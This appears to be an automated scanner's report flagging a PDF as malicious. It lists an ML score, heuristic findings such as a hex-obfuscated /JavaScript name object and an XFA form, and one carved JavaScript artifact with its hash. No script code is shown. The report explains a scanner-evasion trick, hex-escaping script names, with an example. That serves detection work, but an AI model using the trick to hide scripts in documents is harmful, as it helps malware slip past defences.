Verdict: MALICIOUS
Risk Score: 178

Machine Learning:
- Nyx PDF Classifier malicious score 0.9386
Heuristics (7):
- ClamAV: Heuristics.PDF.ObfuscatedNameObject (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Heuristics.PDF.ObfuscatedNameObject
- Hex-obfuscated scripting name object (critical, PDF_OBFUSCATED_NAME_OBJECT): A PDF name object that drives script execution (/JavaScript or /JS) is written with #XX hex escapes to hide it from string-based scanners, e.g. /J#61v#61S#63r#69p#74 decoding to /JavaScript. Legitimate PDF producers always write these names literally; hex-encoding an executable name is a deliberate evasion used by exploit-kit and dropper PDFs.
- JavaScript action (low, 1 related finding, PDF_JAVASCRIPT): PDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
- Embedded JS stream (low, PDF_JS): PDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
- XFA form (low, PDF_XFA): PDF uses XML Forms Architecture, which can contain script logic.
- Suspicious extracted artifact (info, EXTRACTED_FILE_STATIC_TRIAGE): One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
- Embedded URL (info, EMBEDDED_URL): One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
  - http://ns.adobe.com/xdp/ (in PDF document text)
  - http://www.xfa.org/schema/xci/2.6/ (in PDF document text)
  - http://www.xfa.org/schema/xfa-template/2.6/ (in PDF document text)
Extracted artifacts (1)
Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| javascript_obj0012_000.js | pdf-javascript-stream | PDF /JS object 12 at offset 0xA1F7 | 3805 bytes |

SHA-256: 09facb3cfebd564985b4a624c4fe038106f77656e1e516616c8131ca3b68e056

Detection:
- ClamAV: No threats found
- Obfuscation or payload: likely. 6 of 11 identifiers look randomly generated (e.g. 'lCJHTRgrqZthJWQsxEEVTmxkIKoAGvQJfoLTJqYi'), consistent with name-mangling obfuscation.
Preview script: first 1,000 lines of the extracted script.